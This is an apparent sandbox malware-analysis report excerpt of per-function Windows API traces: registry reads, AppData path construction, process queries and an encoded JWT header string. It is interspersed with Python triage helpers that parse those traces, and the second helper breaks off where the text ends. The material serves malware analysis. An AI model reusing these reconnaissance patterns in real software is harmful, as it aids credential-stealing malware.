                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                              • String ID:
                              • API String ID: 3040284667-0
                              • Opcode ID: 16a6be6b4306c747f1b1d8b86c21e4e8aff724b2b17c4125459aff901373f41f
                              • Instruction ID: b2bb91279ed191ea438feaad77f13b5f00d7992ecb6f8ec1d7c62ea95ed40f5f
                              • Opcode Fuzzy Hash: 16a6be6b4306c747f1b1d8b86c21e4e8aff724b2b17c4125459aff901373f41f
                              • Instruction Fuzzy Hash: 4221E2B1518301EF8750DF69D88495BBBF8EEC8314F409E1EF599D3224E735D5088BA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E53166
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E5316D
                              • RegOpenKeyExA.ADVAPI32(80000002,00D1BB90,00000000,00020119,?), ref: 00E5318C
                              • RegQueryValueExA.ADVAPI32(?,00D2E398,00000000,00000000,00000000,000000FF), ref: 00E531A7
                              • RegCloseKey.ADVAPI32(?), ref: 00E531B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 52e425a9e5f16c63c751d65dce44598e017a1e67a4afa880f1298960e69004ec
                              • Instruction ID: 83e44a4be21c2f0aa762980d9944cdf3a6fc095daf0ba9d2a9e62f2d9fc0787b
                              • Opcode Fuzzy Hash: 52e425a9e5f16c63c751d65dce44598e017a1e67a4afa880f1298960e69004ec
                              • Instruction Fuzzy Hash: D71142B6A40309AFD720CF94D945FABBBBCEB44715F00462AFA05E3684D77559048BA1
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E38996
                                • Part of subcall function 00E5A1C0: std::exception::exception.LIBCMT ref: 00E5A1D5
                                • Part of subcall function 00E5A1C0: std::exception::exception.LIBCMT ref: 00E5A1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E389CD
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: invalid string position$string too long
                              • API String ID: 2002836212-4289949731
                              • Opcode ID: 5a7c27bf2a80857edcc84ac12e26a7020a5db68d6e2af246997922ecfca98df5
                              • Instruction ID: d8c2031c2d467293afc2f1181a9d95adb4fa88f2aa5ac740c1c7fd1cc963ea49
                              • Opcode Fuzzy Hash: 5a7c27bf2a80857edcc84ac12e26a7020a5db68d6e2af246997922ecfca98df5
                              • Instruction Fuzzy Hash: 7D21D6723007504BC7219A6CE944A6AFBE9DBE17A1F14293FF145DB281CB71DC41C3A6
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E38883
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: f1030f8a3e7b60743c62053317c322cde2aee03a2d854c193ad56b2042435584
                              • Instruction ID: 622d7672b7a10cd40c00efc4c532116571176bf6075ccedc1e66704731c754c7
                              • Opcode Fuzzy Hash: f1030f8a3e7b60743c62053317c322cde2aee03a2d854c193ad56b2042435584
                              • Instruction Fuzzy Hash: C631BBB5E005159FCB08DF58C9916ADBBB6EB88350F18C269E915EF384DB30AD01CBD1
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55922
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55935
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_std::exception::exception
                              • String ID: Sec-WebSocket-Version: 13$string too long
                              • API String ID: 1928653953-3304177573
                              • Opcode ID: 2f45ba4dc9a47fcf71be4391d870a8b7e30231819567c657aa27340364611de6
                              • Instruction ID: e5ac89477e78981571a8004fd7c34316b8846fccfac5d5d977afc68b49996aaf
                              • Opcode Fuzzy Hash: 2f45ba4dc9a47fcf71be4391d870a8b7e30231819567c657aa27340364611de6
                              • Instruction Fuzzy Hash: C0118232304B40CBC7328B2CE810719B7E1EBD6762F252F6DE8E1A7695C765D849C7A1
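The records above are raw per-function listings: a sequence of resolved API calls with their call-site addresses, plus the format and literal strings the function references. Reading them by hand is slow, so below is an added triage helper (written for this page, not Joe Sandbox code and not part of the report) that parses lines in exactly the format printed here ("• API.MODULE(args), ref: ADDR", with "Part of subcall function" hits kept but tagged) and applies three heuristics drawn from the functions in this section: the GetSystemTime / sscanf / SystemTimeToFileTime / ExitProcess sequence, which is the shape of a date-gated execution (expiry) check; the RegOpenKeyExA call whose first argument 80000002 is HKEY_LOCAL_MACHINE and whose samDesired 00020119 decodes, per the Win32 headers, to KEY_READ | KEY_WOW64_64KEY; and the GetProcessHeap / RtlAllocateHeap / wsprintfA functions whose format strings ("%d MB", "%dx%d") format a numeric system property into a fresh buffer. The labels the code emits are analyst inferences, not report output, and SAMPLE_REPORT is constructed from listing lines of the kind shown in these records.

```python
"""Added example (not part of the Joe Sandbox report): parse per-function "APIs"
listings into call sequences and apply triage heuristics to them."""
import re
from dataclasses import dataclass
from typing import List, Optional
# Matches "• sscanf.NTDLL ref: 00E51B9A" and "• Part of subcall function 00E51820: lstrcpy.KERNEL32(...), ref: ..."
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<callee>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w:~<>]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
STRING_ID = re.compile(r"•\s*String ID:\s*(?P<ids>.*)")

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                   # call-site address in the dumped image
    subcall_of: Optional[str]  # callee address when the hit is inside a subcall

@dataclass
class FunctionRecord:
    calls: List[ApiCall]
    strings: List[str]         # "String ID" entries, split on '$'

    def direct(self) -> List[str]:  # APIs the function calls itself, in listing order
        return [c.api for c in self.calls if c.subcall_of is None]

def parse_report(text: str) -> List[FunctionRecord]:
    # One record per "APIs" heading; every line up to the next heading belongs to it
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord(calls=[], strings=[])
            records.append(current)
        elif current is None:
            continue
        elif (m := API_LINE.search(line)):
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                         m.group("ref"), m.group("callee")))
        elif (s := STRING_ID.match(line)) and s.group("ids").strip():
            current.strings.extend(p for p in s.group("ids").split("$") if p)
    return records

HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ = 0x20019  # STANDARD_RIGHTS_READ | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY (winnt.h)
KEY_BITS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY", 0x8: "KEY_ENUMERATE_SUB_KEYS",
            0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK", 0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY"}

def decode_reg_access(mask: int) -> List[str]:
    # Name the rights in a samDesired mask, collapsing the KEY_READ composite first
    names = []
    if mask & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        mask &= ~KEY_READ
    return names + [n for bit, n in sorted(KEY_BITS.items()) if mask & bit]

def hex_arg(token: str) -> Optional[int]:  # "?" marks an argument the tracer could not resolve
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]+", token) else None

def triage(rec: FunctionRecord) -> List[str]:
    # Heuristic labels for one function; each is an analyst inference, not a report fact
    apis, findings = rec.direct(), []
    # Read the clock, sscanf a hard-coded date, convert both to FILETIME, exit: expiry gate
    if {"GetSystemTime", "sscanf", "SystemTimeToFileTime", "ExitProcess"} <= set(apis):
        findings.append("date-gated execution (expiry / kill-date check)")
    for c in rec.calls:
        if c.api == "RegOpenKeyExA" and c.subcall_of is None and len(c.args) >= 4:
            hive, sam = HIVES.get(hex_arg(c.args[0]), c.args[0]), hex_arg(c.args[3])
            rights = "|".join(decode_reg_access(sam)) if sam is not None else "?"
            findings.append(f"registry read: {hive} opened with {rights}")
    # Heap buffer plus wsprintf of a number: system-profile formatting ("%d MB", "%dx%d")
    if "wsprintfA" in apis and "RtlAllocateHeap" in apis:
        fmts = [s for s in rec.strings if "%d" in s] or ["(format not listed)"]
        findings.append("numeric value formatted into heap buffer: " + ", ".join(fmts))
    return findings

def triage_report(text: str) -> List[List[str]]:
    return [triage(r) for r in parse_report(text)]

SAMPLE_REPORT = """\
APIs
• GetSystemTime.KERNEL32(?), ref: 00E51B72
  • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E5184F
• sscanf.NTDLL ref: 00E51B9A
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00E51BB6
• ExitProcess.KERNEL32 ref: 00E51BE3
APIs
• RegOpenKeyExA.ADVAPI32(80000002,00D1BB90,00000000,00020119,?), ref: 00E5318C
• RegQueryValueExA.ADVAPI32(?,00D2E398,00000000,00000000,00000000,000000FF), ref: 00E531A7
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00E5A430,000000FF), ref: 00E53D20
• RtlAllocateHeap.NTDLL(00000000), ref: 00E53D27
• wsprintfA.USER32 ref: 00E53D37
• String ID: %dx%d
"""
```

Calling triage_report(SAMPLE_REPORT) yields one label list per function: the expiry gate for the first, the HKEY_LOCAL_MACHINE read opened with KEY_READ|KEY_WOW64_64KEY for the second, and the "%dx%d" formatter for the third. The KEY_WOW64_64KEY bit is worth noting on its own: a 32-bit image asking for the 64-bit registry view is reading the native hive rather than the WOW6432Node redirect, which is what a fingerprinting routine wants. To use it on a full report, paste the text of the function listings into parse_report; the regex ignores the Memory Dump Source, Similarity and Associated lines because none of them carry a "ref:" field.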
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00E5A430,000000FF), ref: 00E53D20
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E53D27
                              • wsprintfA.USER32 ref: 00E53D37
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: abd4dfee743f906bb5f691d723e45092ecbf0c5e1527aac305cf7204a6544b1b
                              • Instruction ID: 8f6d788cacfee4a1d00b620b9268cc533c8071bdf330c0bcf9084d2a0710f979
                              • Opcode Fuzzy Hash: abd4dfee743f906bb5f691d723e45092ecbf0c5e1527aac305cf7204a6544b1b
                              • Instruction Fuzzy Hash: F001C071644700BFE7305B54DC0AF6ABB78FB45B66F000115FE45A76D0C7BA1900CBA1
                              APIs
                              • __getptd.LIBCMT ref: 00E59279
                                • Part of subcall function 00E587FF: __amsg_exit.LIBCMT ref: 00E5880F
                              • __amsg_exit.LIBCMT ref: 00E59299
                              Strings
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit$__getptd
                              • String ID: Xu$Xu
                              • API String ID: 441000147-2934775391
                              • Opcode ID: c05c3309c6e4ecc78f1231a90079a65a512f764a0b95ae9597f7d38822a3ad72
                              • Instruction ID: 1f3c06db42176a2e6797a9ebbc5ecdb2e1e77e3a641d6877a2e856c6abb7febf
                              • Opcode Fuzzy Hash: c05c3309c6e4ecc78f1231a90079a65a512f764a0b95ae9597f7d38822a3ad72
                              • Instruction Fuzzy Hash: 9C01043691A721EBD710AB29B4057DE73E06F01B6AF152805EC80771A2CB706C89CBD5
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E38737
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              Strings
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 31c03a08b950551bb31a2374cfe66104021da3d76f62ac4fcdf492275e3044d6
                              • Instruction ID: 177bebbefe246e28506ba8c58dd41745b77f75a91fd982b40df602be4958feb1
                              • Opcode Fuzzy Hash: 31c03a08b950551bb31a2374cfe66104021da3d76f62ac4fcdf492275e3044d6
                              • Instruction Fuzzy Hash: 70F0F023B001210F8304643D8E880AEAC4797E039073AE722F84AFF299EC71EC82C1D0
                              APIs
                                • Part of subcall function 00E5781C: __mtinitlocknum.LIBCMT ref: 00E57832
                                • Part of subcall function 00E5781C: __amsg_exit.LIBCMT ref: 00E5783E
                              • ___addlocaleref.LIBCMT ref: 00E58756
                              Strings
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$Xu$xt
                              • API String ID: 3105635775-2689811054
                              • Opcode ID: 90f204bf632e433a1f89a69bf8bf164a79cec42dbcf07e9a4d4986ebfa69bde0
                              • Instruction ID: 60b430fd1ccd7f5f5a650240b482ca7cd1ab2b84361ab9d689f2db5526390d71
                              • Opcode Fuzzy Hash: 90f204bf632e433a1f89a69bf8bf164a79cec42dbcf07e9a4d4986ebfa69bde0
                              • Instruction Fuzzy Hash: C8018871545700DEE720AF75E80974AB7E0AF50315F20AD4EE8D6B76E1CBB0A548CB11
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4E544
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E573
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E581
                              • lstrcat.KERNEL32(?,00D2E318), ref: 00E4E59C
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 89059040d6f090ed3b7a05ac24e437f62aedf0ab1905819f0b943338ad15d3e2
                              • Instruction ID: 47cfa27f2a0ade4e3e1d7b0f4da3f04ea6161c41c3960303ee24e581b9dce5f0
                              • Opcode Fuzzy Hash: 89059040d6f090ed3b7a05ac24e437f62aedf0ab1905819f0b943338ad15d3e2
                              • Instruction Fuzzy Hash: 3A51C671A10208AFD764EB54EC46EEE37B8FB48300F045899FA45A7345DA75AE44CBA0
                              APIs
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00E51FDF, 00E51FF5, 00E520B7
                              Yara matches
                              Similarity
                              • API ID: strlen
                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 39653677-4138519520
                              • Opcode ID: ae251bb6e0396864492ef06804c0ae77f9d02c75b31d3a6f0c7d715b3c98f483
                              • Instruction ID: aa33db0f60f2c11401df7e4bd2f6c4ed685ab6a5f3b34e79d82c57ba0898d8a7
                              • Opcode Fuzzy Hash: ae251bb6e0396864492ef06804c0ae77f9d02c75b31d3a6f0c7d715b3c98f483
                              • Instruction Fuzzy Hash: 6E215C355112898FCB20EB35D4446EDF367DF813A7F84685ACD182B2C1E332190ED796
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4EBB4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4EBE3
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4EBF1
                              • lstrcat.KERNEL32(?,00D2F218), ref: 00E4EC0C
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 335fa5e5d62ef78130a77055fe1817db6fa2ae481bf5ab0a90c606f103eb8960
                              • Instruction ID: 1cad01788b5c3680df16ef1b420255fee682f4ff4fb2ce2a11be7fb5f7aaec24
                              • Opcode Fuzzy Hash: 335fa5e5d62ef78130a77055fe1817db6fa2ae481bf5ab0a90c606f103eb8960
                              • Instruction Fuzzy Hash: F9317471A10218AFDB25EB64EC46BED77F4BF48300F1054ADFA46A7251DA749E44CB90
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000), ref: 00E54492
                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00E544AD
                              • CloseHandle.KERNEL32(00000000), ref: 00E544B4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E544E7
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                              • String ID:
                              • API String ID: 4028989146-0
                              • Opcode ID: 5b8daf24ff3330d1a4acad3aed1a767f955b58ad59b92375e0c2e1e463964d1f
                              • Instruction ID: 70d1b0c1070ef3a13fc04487cb486af07ef41731bf8dd2f985cf981812ddec0a
                              • Opcode Fuzzy Hash: 5b8daf24ff3330d1a4acad3aed1a767f955b58ad59b92375e0c2e1e463964d1f
                              • Instruction Fuzzy Hash: 6AF0C8F09416156FE730AB749C4DBE67BA8AB1430DF005595FFD5E71C0D6B488C48790
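                              The API call lines in the entries above can be triaged mechanically rather than read one by one: SHGetFolderPathA is called with CSIDL 0x1A (CSIDL_APPDATA, so the lstrcpy/lstrcat chain builds a path under the user's roaming AppData folder), OpenProcess is called with access mask 0x410 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, the minimum needed for the GetModuleFileNameExA call that follows it), and the hex-encoded string at xrefs 00E51FDF/00E51FF5/00E520B7 is ASCII base64 of a JSON object. The following Python is an added example written for this page, not Joe Sandbox's code and not code from the sample: it parses the report's `Name.MODULE(args), ref: addr` lines, names the access-mask bits and CSIDL constant (the tables cover only the values seen on this page, taken from the Windows SDK headers), and decodes the hex string. The input lines are copied from this report.

```python
import base64
import json
import re
from dataclasses import dataclass

# API call lines copied verbatim from the Joe Sandbox function entries on this page.
REPORT_API_LINES = [
    "SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4E544",
    "lstrcat.KERNEL32(?,00D2E318), ref: 00E4E59C",
    "OpenProcess.KERNEL32(00000410,00000000), ref: 00E54492",
    "GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00E544AD",
    "wsprintfA.USER32 ref: 00E53D37",
]

# Hex-encoded string reported at xrefs 00E51FDF, 00E51FF5, 00E520B7 (copied from the report).
REPORT_HEX_STRING = (
    "65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 "
    "4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30"
)

# Joe Sandbox prints calls as Name.MODULE(arg,arg,...), ref: ADDR; the argument list is
# absent when the plugin could not recover it (see the wsprintfA line above).
API_LINE_RE = re.compile(
    r"^(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list  # None for '?' (value unknown to the analysis), int otherwise
    ref: int    # virtual address of the call site


def parse_api_line(line):
    m = API_LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    raw_args = m.group("args") or ""
    args = [None if a == "?" else int(a, 16) for a in raw_args.split(",") if a != ""]
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


# Only the constants that appear on this page (winnt.h / shlobj.h values).
PROCESS_ACCESS_BITS = {0x0010: "PROCESS_VM_READ", 0x0400: "PROCESS_QUERY_INFORMATION"}
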